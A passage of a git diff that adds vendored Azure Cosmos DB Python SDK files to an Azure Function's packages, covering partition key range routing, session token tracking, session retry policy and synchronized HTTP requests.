+        list of overlapping partition key ranges.
+
+        :param str collection_link: The name of the collection.
+        :param list partition_key_ranges: List of partition key ranges.
+        :return: List of overlapping partition key ranges.
+        :rtype: list
+        """
+        cl = self._documentClient
+
+        collection_id = _base.GetResourceIdOrFullNameFromLink(collection_link)
+
+        collection_routing_map = self._collection_routing_map_by_item.get(collection_id)
+        if collection_routing_map is None:
+            collection_pk_ranges = list(cl._ReadPartitionKeyRanges(collection_link))
+            # for large collections, a split may complete between pages of the partition key
+            # ranges query, so the results can contain both the child ranges and their parents.
+            # The parent ranges must be discarded to build a valid routing map.
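+            # Illustrative sketch (hypothetical values): after a split of parent range "1"
+            # into children "2" and "3", the pages could contain all three entries:
+            #   {"id": "1", "minInclusive": "", "maxExclusive": "FF", "parents": []}
+            #   {"id": "2", "minInclusive": "", "maxExclusive": "7F", "parents": ["1"]}
+            #   {"id": "3", "minInclusive": "7F", "maxExclusive": "FF", "parents": ["1"]}
+            # _discard_parent_ranges drops "1" because its id appears in a child's "parents"
+            # list, leaving only the children, which form a complete, non-overlapping map.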
+            collection_pk_ranges = PartitionKeyRangeCache._discard_parent_ranges(collection_pk_ranges)
+            collection_routing_map = CollectionRoutingMap.CompleteRoutingMap(
+                [(r, True) for r in collection_pk_ranges], collection_id
+            )
+            self._collection_routing_map_by_item[collection_id] = collection_routing_map
+        return collection_routing_map.get_overlapping_ranges(partition_key_ranges)
+
+    @staticmethod
+    def _discard_parent_ranges(partitionKeyRanges):
+        parentIds = set()
+        for r in partitionKeyRanges:
+            if isinstance(r, dict) and PartitionKeyRange.Parents in r:
+                for parentId in r[PartitionKeyRange.Parents]:
+                    parentIds.add(parentId)
+        return (r for r in partitionKeyRanges if r[PartitionKeyRange.Id] not in parentIds)
+
+
+def _second_range_is_after_first_range(range1, range2):
+    if range1.max > range2.min:
+        # range2 starts before range1 ends, so the ranges overlap
+        return False
+
+    if range2.min == range1.max and range1.isMaxInclusive and range2.isMinInclusive:
+        # the inclusive ending endpoint of range1 coincides with the inclusive
+        # beginning endpoint of range2, so the two ranges share a point
+        return False
+
+    return True
+
+
+def _is_sorted_and_non_overlapping(ranges):
+    for idx, r in list(enumerate(ranges))[1:]:
+        previous_r = ranges[idx - 1]
+        if not _second_range_is_after_first_range(previous_r, r):
+            return False
+    return True
+
+
+def _subtract_range(r, partition_key_range):
+    """Evaluates and returns r - partition_key_range
+
+    :param routing_range.Range r: Query range.
+    :param dict partition_key_range: Partition key range.
+    :return: The difference r - partition_key_range.
+    :rtype: routing_range.Range
+    """
+
+    left = max(partition_key_range[routing_range.PartitionKeyRange.MaxExclusive], r.min)
+
+    if left == r.min:
+        leftInclusive = r.isMinInclusive
+    else:
+        leftInclusive = False
+
+    queryRange = routing_range.Range(left, r.max, leftInclusive, r.isMaxInclusive)
+    return queryRange
+
+
+class SmartRoutingMapProvider(PartitionKeyRangeCache):
+    """
+    Efficiently uses PartitionKeyRangeCache and minimizes unnecessary
+    invocations of CollectionRoutingMap.get_overlapping_ranges().
+    """
+
+    def get_overlapping_ranges(self, collection_link, partition_key_ranges):
+        """
+        Given the sorted ranges and a collection, returns the list of
+        overlapping partition key ranges.
+
+        :param str collection_link: The collection link.
+        :param (list of routing_range.Range) partition_key_ranges:
+            The sorted list of non-overlapping ranges.
+        :return: List of partition key ranges.
+        :rtype: list of dict
+        :raises ValueError:
+            If two ranges in partition_key_ranges overlap or if the list is not sorted
+        """
+
+        # validate that the list is sorted and non-overlapping
+        if not _is_sorted_and_non_overlapping(partition_key_ranges):
+            raise ValueError("the list of ranges is not sorted or contains overlapping ranges")
+
+        target_partition_key_ranges = []
+
+        it = iter(partition_key_ranges)
+        try:
+            currentProvidedRange = next(it)
+            while True:
+                if currentProvidedRange.isEmpty():
+                    # skip and go to the next item
+                    currentProvidedRange = next(it)
+                    continue
+
+                if target_partition_key_ranges:
+                    queryRange = _subtract_range(currentProvidedRange, target_partition_key_ranges[-1])
+                else:
+                    queryRange = currentProvidedRange
+
+                overlappingRanges = PartitionKeyRangeCache.get_overlapping_ranges(self, collection_link, queryRange)
+                assert overlappingRanges, "code bug: returned overlapping ranges for queryRange {} is empty".format(
+                    queryRange
+                )
+                target_partition_key_ranges.extend(overlappingRanges)
+
+                lastKnownTargetRange = routing_range.Range.PartitionKeyRangeToRange(target_partition_key_ranges[-1])
+
+                # the overlapping ranges must contain the requested range
+                assert (
+                    currentProvidedRange.max <= lastKnownTargetRange.max
+                ), "code bug: returned overlapping ranges {} does not contain the requested range {}".format(
+                    overlappingRanges, queryRange
+                )
+
+                # the current range is contained in target_partition_key_ranges; just move forward
+                currentProvidedRange = next(it)
+
+                while currentProvidedRange.max <= lastKnownTargetRange.max:
+                    # the current range is covered too; just move forward
+                    currentProvidedRange = next(it)
+        except StopIteration:
+            # the iterator is exhausted; there is nothing else to be done
+            pass
+
+        return target_partition_key_ranges
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/routing_range.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/routing_range.py
new file mode 100644
index 0000000..cb7ced3
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/routing_range.py
@@ -0,0 +1,133 @@
+# The MIT License (MIT)
+# Copyright (c) 2014 Microsoft Corporation
+
+# Permission is hereby granted, free of charge, to any person obtaining a copy
+# of this software and associated documentation files (the "Software"), to deal
+# in the Software without restriction, including without limitation the rights
+# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+# copies of the Software, and to permit persons to whom the Software is
+# furnished to do so, subject to the following conditions:
+
+# The above copyright notice and this permission notice shall be included in all
+# copies or substantial portions of the Software.
+
+# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+# SOFTWARE.
+
+"""Internal class for partition key range implementation in the Azure Cosmos
+database service.
+""" + + +class PartitionKeyRange(object): + """Partition Key Range Constants""" + + MinInclusive = "minInclusive" + MaxExclusive = "maxExclusive" + Id = "id" + Parents = "parents" + + +class Range(object): + """description of class""" + + MinPath = "min" + MaxPath = "max" + IsMinInclusivePath = "isMinInclusive" + IsMaxInclusivePath = "isMaxInclusive" + + def __init__(self, range_min, range_max, isMinInclusive, isMaxInclusive): + if range_min is None: + raise ValueError("min is missing") + if range_max is None: + raise ValueError("max is missing") + + self.min = range_min + self.max = range_max + self.isMinInclusive = isMinInclusive + self.isMaxInclusive = isMaxInclusive + + def contains(self, value): + minToValueRelation = self.min > value + maxToValueRelation = self.max > value + return ( + (self.isMinInclusive and minToValueRelation <= 0) or (not self.isMinInclusive and minToValueRelation < 0) + ) and ( + (self.isMaxInclusive and maxToValueRelation >= 0) or (not self.isMaxInclusive and maxToValueRelation > 0) + ) + + @classmethod + def PartitionKeyRangeToRange(cls, partition_key_range): + self = cls( + partition_key_range[PartitionKeyRange.MinInclusive], + partition_key_range[PartitionKeyRange.MaxExclusive], + True, + False, + ) + return self + + @classmethod + def ParseFromDict(cls, range_as_dict): + self = cls( + range_as_dict[Range.MinPath], + range_as_dict[Range.MaxPath], + range_as_dict[Range.IsMinInclusivePath], + range_as_dict[Range.IsMaxInclusivePath], + ) + return self + + def isSingleValue(self): + return self.isMinInclusive and self.isMaxInclusive and self.min == self.max + + def isEmpty(self): + return (not (self.isMinInclusive and self.isMaxInclusive)) and self.min == self.max + + def __hash__(self): + return hash((self.min, self.max, self.isMinInclusive, self.isMaxInclusive)) + + def __str__(self): + + return ( + ("[" if self.isMinInclusive else "(") + + str(self.min) + + "," + + str(self.max) + + ("]" if self.isMaxInclusive else ")") + ) + + def __eq__(self, other): + return ( + (self.min == other.min) + and (self.max == other.max) + and (self.isMinInclusive == other.isMinInclusive) + and (self.isMaxInclusive == other.isMaxInclusive) + ) + + @staticmethod + def _compare_helper(a, b): + # python 3 compatible + return (a > b) - (a < b) + + @staticmethod + def overlaps(range1, range2): + + if range1 is None or range2 is None: + return False + if range1.isEmpty() or range2.isEmpty(): + return False + + cmp1 = Range._compare_helper(range1.min, range2.max) + cmp2 = Range._compare_helper(range2.min, range1.max) + + if cmp1 <= 0 or cmp2 <= 0: + if (cmp1 == 0 and not (range1.isMinInclusive and range2.isMaxInclusive)) or ( + cmp2 == 0 and not (range2.isMinInclusive and range1.isMaxInclusive) + ): + return False + return True + return False diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_runtime_constants.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_runtime_constants.py new file mode 100644 index 0000000..7979647 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_runtime_constants.py @@ -0,0 +1,43 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the 
rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Runtime Constants in the Azure Cosmos database service. +""" + + +class MediaTypes(object): + """Constants of media types. + + See http://www.iana.org/assignments/media-types/media-types.xhtml for + more information. + """ + + Any = "*/*" + ImageJpeg = "image/jpeg" + ImagePng = "image/png" + JavaScript = "application/x-javascript" + Json = "application/json" + OctetStream = "application/octet-stream" + QueryJson = "application/query+json" + SQL = "application/sql" + TextHtml = "text/html" + TextPlain = "text/plain" + Xml = "application/xml" diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_session.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_session.py new file mode 100644 index 0000000..90092ff --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_session.py @@ -0,0 +1,216 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Session Consistency Tracking in the Azure Cosmos database service. +""" + +import sys +import traceback +import threading + +from . import _base +from . import http_constants +from ._vector_session_token import VectorSessionToken +from .exceptions import CosmosHttpResponseError + + +class SessionContainer(object): + def __init__(self): + self.collection_name_to_rid = {} + self.rid_to_session_token = {} + self.session_lock = threading.RLock() + + def get_session_token(self, resource_path): + """Get Session Token for collection_link. 
+ + :param str resource_path: Self link / path to the resource + :return: Session Token dictionary for the collection_id + :rtype: dict + """ + + with self.session_lock: + is_name_based = _base.IsNameBased(resource_path) + collection_rid = "" + session_token = "" + + try: + if is_name_based: + # get the collection name + collection_name = _base.GetItemContainerLink(resource_path) + collection_rid = self.collection_name_to_rid[collection_name] + else: + collection_rid = _base.GetItemContainerLink(resource_path) + + if collection_rid in self.rid_to_session_token: + token_dict = self.rid_to_session_token[collection_rid] + session_token_list = [] + for key in token_dict.keys(): + session_token_list.append("{0}:{1}".format(key, token_dict[key].convert_to_string())) + session_token = ",".join(session_token_list) + return session_token + + # return empty token if not found + return "" + except Exception: # pylint: disable=broad-except + return "" + + def set_session_token(self, response_result, response_headers): + """Session token must only be updated from response of requests that + successfully mutate resource on the server side (write, replace, delete etc). + + :param dict response_result: + :param dict response_headers: + :return: None + """ + + # there are two pieces of information that we need to update session token- + # self link which has the rid representation of the resource, and + # x-ms-alt-content-path which is the string representation of the resource + + with self.session_lock: + collection_rid = "" + collection_name = "" + + try: + self_link = response_result["_self"] + + # extract alternate content path from the response_headers + # (only document level resource updates will have this), + # and if not present, then we can assume that we don't have to update + # session token for this request + alt_content_path = "" + alt_content_path_key = http_constants.HttpHeaders.AlternateContentPath + response_result_id_key = u"id" + response_result_id = None + if alt_content_path_key in response_headers: + alt_content_path = response_headers[http_constants.HttpHeaders.AlternateContentPath] + response_result_id = response_result[response_result_id_key] + else: + return + collection_rid, collection_name = _base.GetItemContainerInfo( + self_link, alt_content_path, response_result_id + ) + + except ValueError: + return + except Exception: # pylint: disable=broad-except + exc_type, exc_value, exc_traceback = sys.exc_info() + traceback.print_exception(exc_type, exc_value, exc_traceback, limit=2, file=sys.stdout) + return + + if collection_name in self.collection_name_to_rid: + # check if the rid for the collection name has changed + # this means that potentially, the collection was deleted + # and recreated + existing_rid = self.collection_name_to_rid[collection_name] + if collection_rid != existing_rid: + # flush the session tokens for the old rid, and + # update the new rid into the collection name to rid map. 
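+                    # Likely rationale: tokens cached under the old rid describe the
+                    # deleted incarnation of the collection; reusing them could demand
+                    # LSNs that the recreated collection never reaches, so they are
+                    # flushed and rebuilt under the new rid.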
+                    self.rid_to_session_token[existing_rid] = {}
+                    self.collection_name_to_rid[collection_name] = collection_rid
+
+            # parse session token
+            parsed_tokens = self.parse_session_token(response_headers)
+
+            # update session token in collection rid to session token map
+            if collection_rid in self.rid_to_session_token:
+                # we need to update the session tokens for 'this' collection
+                for id_ in parsed_tokens:
+                    old_session_token = (
+                        self.rid_to_session_token[collection_rid][id_]
+                        if id_ in self.rid_to_session_token[collection_rid]
+                        else None
+                    )
+                    if not old_session_token:
+                        self.rid_to_session_token[collection_rid][id_] = parsed_tokens[id_]
+                    else:
+                        self.rid_to_session_token[collection_rid][id_] = parsed_tokens[id_].merge(old_session_token)
+                    self.collection_name_to_rid[collection_name] = collection_rid
+            else:
+                self.rid_to_session_token[collection_rid] = parsed_tokens
+                self.collection_name_to_rid[collection_name] = collection_rid
+
+    def clear_session_token(self, response_headers):
+        with self.session_lock:
+            collection_rid = ""
+            alt_content_path = ""
+            alt_content_path_key = http_constants.HttpHeaders.AlternateContentPath
+            if alt_content_path_key in response_headers:
+                alt_content_path = response_headers[http_constants.HttpHeaders.AlternateContentPath]
+                if alt_content_path in self.collection_name_to_rid:
+                    collection_rid = self.collection_name_to_rid[alt_content_path]
+                    del self.collection_name_to_rid[alt_content_path]
+                    del self.rid_to_session_token[collection_rid]
+
+    @staticmethod
+    def parse_session_token(response_headers):
+        """Extracts the session token from the response headers and parses it.
+
+        :param dict response_headers:
+        :return: A dictionary of partition id to session lsn for the given collection
+        :rtype: dict
+        """
+
+        # extract session token from response header
+        session_token = ""
+        if http_constants.HttpHeaders.SessionToken in response_headers:
+            session_token = response_headers[http_constants.HttpHeaders.SessionToken]
+
+        id_to_sessionlsn = {}
+        if session_token:
+            # extract id and lsn from the token. For a partitioned collection,
+            # the token is a comma-separated concatenation of <id>:<token> pairs,
+            # one per partition key range
+            token_pairs = session_token.split(",")
+            for token_pair in token_pairs:
+                tokens = token_pair.split(":")
+                if len(tokens) == 2:
+                    id_ = tokens[0]
+                    sessionToken = VectorSessionToken.create(tokens[1])
+                    if sessionToken is None:
+                        raise CosmosHttpResponseError(
+                            status_code=http_constants.StatusCodes.INTERNAL_SERVER_ERROR,
+                            message="Could not parse the received session token: %s" % tokens[1],
+                        )
+                    id_to_sessionlsn[id_] = sessionToken
+        return id_to_sessionlsn
+
+
+class Session(object):
+    """State of an Azure Cosmos session.
+
+    This session object can be shared across clients within the same process.
+ + :param url_connection: + """ + + def __init__(self, url_connection): + self.url_connection = url_connection + self.session_container = SessionContainer() + # include creation time, and some other stats + + def clear_session_token(self, response_headers): + self.session_container.clear_session_token(response_headers) + + def update_session(self, response_result, response_headers): + self.session_container.set_session_token(response_result, response_headers) + + def get_session_token(self, resource_path): + return self.session_container.get_session_token(resource_path) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_session_retry_policy.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_session_retry_policy.py new file mode 100644 index 0000000..bf6e4de --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_session_retry_policy.py @@ -0,0 +1,115 @@ +# The MIT License (MIT) +# Copyright (c) 2018 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal class for session read/write unavailable retry policy implementation +in the Azure Cosmos database service. +""" + +import logging +from azure.cosmos.documents import _OperationType + +logger = logging.getLogger(__name__) +logger.setLevel(logging.INFO) +log_formatter = logging.Formatter("%(levelname)s:%(message)s") +log_handler = logging.StreamHandler() +log_handler.setFormatter(log_formatter) +logger.addHandler(log_handler) + + +class _SessionRetryPolicy(object): + """The session retry policy used to handle read/write session unavailability. 
+ """ + + Max_retry_attempt_count = 1 + Retry_after_in_milliseconds = 0 + + def __init__(self, endpoint_discovery_enable, global_endpoint_manager, *args): + self.global_endpoint_manager = global_endpoint_manager + self._max_retry_attempt_count = _SessionRetryPolicy.Max_retry_attempt_count + self.session_token_retry_count = 0 + self.retry_after_in_milliseconds = _SessionRetryPolicy.Retry_after_in_milliseconds + self.endpoint_discovery_enable = endpoint_discovery_enable + self.request = args[0] if args else None + if self.request: + self.can_use_multiple_write_locations = self.global_endpoint_manager.can_use_multiple_write_locations( + self.request + ) + # clear previous location-based routing directive + self.request.clear_route_to_location() + + # Resolve the endpoint for the request and pin the resolution to the resolved endpoint + # This enables marking the endpoint unavailability on endpoint failover/unreachability + self.location_endpoint = self.global_endpoint_manager.resolve_service_endpoint(self.request) + self.request.route_to_location(self.location_endpoint) + + def ShouldRetry(self, _exception): + """Returns true if should retry based on the passed-in exception. + + :param (exceptions.CosmosHttpResponseError instance) exception: + :rtype: boolean + """ + self.session_token_retry_count += 1 + # clear previous location-based routing directive + self.request.clear_route_to_location() + + if not self.endpoint_discovery_enable: + # if endpoint discovery is disabled, the request cannot be retried anywhere else + return False + + if self.can_use_multiple_write_locations: + if _OperationType.IsReadOnlyOperation(self.request.operation_type): + endpoints = self.global_endpoint_manager.get_ordered_read_endpoints() + else: + endpoints = self.global_endpoint_manager.get_ordered_write_endpoints() + + if self.session_token_retry_count > len(endpoints): + # When use multiple write locations is true and the request has been tried + # on all locations, then don't retry the request + return False + + # set location-based routing directive based on request retry context + self.request.route_to_location_with_preferred_location_flag( + self.session_token_retry_count - 1, self.session_token_retry_count > self._max_retry_attempt_count + ) + self.request.should_clear_session_token_on_session_read_failure = self.session_token_retry_count == len( + endpoints + ) # clear on last attempt + + # Resolve the endpoint for the request and pin the resolution to the resolved endpoint + # This enables marking the endpoint unavailability on endpoint failover/unreachability + self.location_endpoint = self.global_endpoint_manager.resolve_service_endpoint(self.request) + self.request.route_to_location(self.location_endpoint) + return True + + if self.session_token_retry_count > self._max_retry_attempt_count: + # When cannot use multiple write locations, then don't retry the request if + # we have already tried this request on the write location + return False + + # set location-based routing directive based on request retry context + self.request.route_to_location_with_preferred_location_flag(self.session_token_retry_count - 1, False) + self.request.should_clear_session_token_on_session_read_failure = True + + # Resolve the endpoint for the request and pin the resolution to the resolved endpoint + # This enables marking the endpoint unavailability on endpoint failover/unreachability + self.location_endpoint = self.global_endpoint_manager.resolve_service_endpoint(self.request) + 
self.request.route_to_location(self.location_endpoint)
+        return True
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_synchronized_request.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_synchronized_request.py
new file mode 100644
index 0000000..96ff68f
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_synchronized_request.py
@@ -0,0 +1,215 @@
+# The MIT License (MIT)
+# Copyright (c) 2014 Microsoft Corporation
+
+# Permission is hereby granted, free of charge, to any person obtaining a copy
+# of this software and associated documentation files (the "Software"), to deal
+# in the Software without restriction, including without limitation the rights
+# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+# copies of the Software, and to permit persons to whom the Software is
+# furnished to do so, subject to the following conditions:
+
+# The above copyright notice and this permission notice shall be included in all
+# copies or substantial portions of the Software.
+
+# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+# SOFTWARE.
+
+"""Synchronized request in the Azure Cosmos database service.
+"""
+
+import json
+import time
+
+from urllib.parse import urlparse
+from azure.core.exceptions import DecodeError  # type: ignore
+
+from . import exceptions
+from . import http_constants
+from . import _retry_utility
+
+
+def _is_readable_stream(obj):
+    """Checks whether obj is a file-like readable stream.
+
+    :rtype: boolean
+    """
+    if hasattr(obj, "read") and callable(getattr(obj, "read")):
+        return True
+    return False
+
+
+def _request_body_from_data(data):
+    """Gets the request body from data.
+
+    Serializes `data` into a compact JSON string when it is a dict, list, or
+    tuple; otherwise returns `data` unchanged.
+
+    :param (str, unicode, file-like stream object, dict, list or None) data:
+
+    :rtype:
+        str, unicode, file-like stream object, or None
+
+    """
+    if data is None or isinstance(data, str) or _is_readable_stream(data):
+        return data
+    if isinstance(data, (dict, list, tuple)):
+
+        json_dumped = json.dumps(data, separators=(",", ":"))
+
+        return json_dumped
+    return None
+
+
+def _Request(global_endpoint_manager, request_params, connection_policy, pipeline_client, request, **kwargs):
+    """Makes one http request using the requests module.
+ + :param _GlobalEndpointManager global_endpoint_manager: + :param dict request_params: + contains the resourceType, operationType, endpointOverride, + useWriteEndpoint, useAlternateWriteEndpoint information + :param documents.ConnectionPolicy connection_policy: + :param azure.core.PipelineClient pipeline_client: + Pipeline client to process the request + :param azure.core.HttpRequest request: + The request object to send through the pipeline + :return: tuple of (result, headers) + :rtype: tuple of (dict, dict) + + """ + # pylint: disable=protected-access + + connection_timeout = connection_policy.RequestTimeout + connection_timeout = kwargs.pop("connection_timeout", connection_timeout / 1000.0) + + # Every request tries to perform a refresh + client_timeout = kwargs.get('timeout') + start_time = time.time() + global_endpoint_manager.refresh_endpoint_list(None, **kwargs) + if client_timeout is not None: + kwargs['timeout'] = client_timeout - (time.time() - start_time) + if kwargs['timeout'] <= 0: + raise exceptions.CosmosClientTimeoutError() + + if request_params.endpoint_override: + base_url = request_params.endpoint_override + else: + base_url = global_endpoint_manager.resolve_service_endpoint(request_params) + if base_url != pipeline_client._base_url: + request.url = request.url.replace(pipeline_client._base_url, base_url) + + parse_result = urlparse(request.url) + + # The requests library now expects header values to be strings only starting 2.11, + # and will raise an error on validation if they are not, so casting all header values to strings. + request.headers.update({header: str(value) for header, value in request.headers.items()}) + + # We are disabling the SSL verification for local emulator(localhost/127.0.0.1) or if the user + # has explicitly specified to disable SSL verification. 
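+    # For example, https://myaccount.documents.azure.com:443/ (a hypothetical account
+    # endpoint) keeps verification enabled, while https://localhost:8081/ (the
+    # emulator's default endpoint) does not; is_ssl_enabled is handed to azure.core
+    # below as the connection_verify flag.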
+ is_ssl_enabled = ( + parse_result.hostname != "localhost" + and parse_result.hostname != "127.0.0.1" + and not connection_policy.DisableSSLVerification + ) + + if connection_policy.SSLConfiguration or "connection_cert" in kwargs: + ca_certs = connection_policy.SSLConfiguration.SSLCaCerts + cert_files = (connection_policy.SSLConfiguration.SSLCertFile, connection_policy.SSLConfiguration.SSLKeyFile) + response = _PipelineRunFunction( + pipeline_client, + request, + connection_timeout=connection_timeout, + connection_verify=kwargs.pop("connection_verify", ca_certs), + connection_cert=kwargs.pop("connection_cert", cert_files), + **kwargs + ) + else: + response = _PipelineRunFunction( + pipeline_client, + request, + connection_timeout=connection_timeout, + # If SSL is disabled, verify = false + connection_verify=kwargs.pop("connection_verify", is_ssl_enabled), + **kwargs + ) + + response = response.http_response + headers = dict(response.headers) + + data = response.body() + if data: + data = data.decode("utf-8") + + if response.status_code == 404: + raise exceptions.CosmosResourceNotFoundError(message=data, response=response) + if response.status_code == 409: + raise exceptions.CosmosResourceExistsError(message=data, response=response) + if response.status_code == 412: + raise exceptions.CosmosAccessConditionFailedError(message=data, response=response) + if response.status_code >= 400: + raise exceptions.CosmosHttpResponseError(message=data, response=response) + + result = None + if data: + try: + result = json.loads(data) + except Exception as e: + raise DecodeError( + message="Failed to decode JSON data: {}".format(e), + response=response, + error=e) + + return result, headers + + +def _PipelineRunFunction(pipeline_client, request, **kwargs): + # pylint: disable=protected-access + + return pipeline_client._pipeline.run(request, **kwargs) + +def SynchronizedRequest( + client, + request_params, + global_endpoint_manager, + connection_policy, + pipeline_client, + request, + request_data, + **kwargs +): + """Performs one synchronized http request according to the parameters. + + :param object client: Document client instance + :param dict request_params: + :param _GlobalEndpointManager global_endpoint_manager: + :param documents.ConnectionPolicy connection_policy: + :param azure.core.PipelineClient pipeline_client: PipelineClient to process the request. 
+    :param (str, unicode, file-like stream object, dict, list or None) request_data:
+    :return: tuple of (result, headers)
+    :rtype: tuple of (dict, dict)
+    """
+    request.data = _request_body_from_data(request_data)
+    if request.data and isinstance(request.data, str):
+        request.headers[http_constants.HttpHeaders.ContentLength] = len(request.data)
+    elif request.data is None:
+        request.headers[http_constants.HttpHeaders.ContentLength] = 0
+
+    # Pass the _Request function with its parameters to _retry_utility's Execute
+    # method, which wraps the call with retries
+    return _retry_utility.Execute(
+        client,
+        global_endpoint_manager,
+        _Request,
+        request_params,
+        connection_policy,
+        pipeline_client,
+        request,
+        **kwargs
+    )
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_utils.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_utils.py
new file mode 100644
index 0000000..ee80a96
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_utils.py
@@ -0,0 +1,51 @@
+# The MIT License (MIT)
+# Copyright (c) 2014 Microsoft Corporation
+
+# Permission is hereby granted, free of charge, to any person obtaining a copy
+# of this software and associated documentation files (the "Software"), to deal
+# in the Software without restriction, including without limitation the rights
+# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+# copies of the Software, and to permit persons to whom the Software is
+# furnished to do so, subject to the following conditions:
+
+# The above copyright notice and this permission notice shall be included in all
+# copies or substantial portions of the Software.
+
+# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
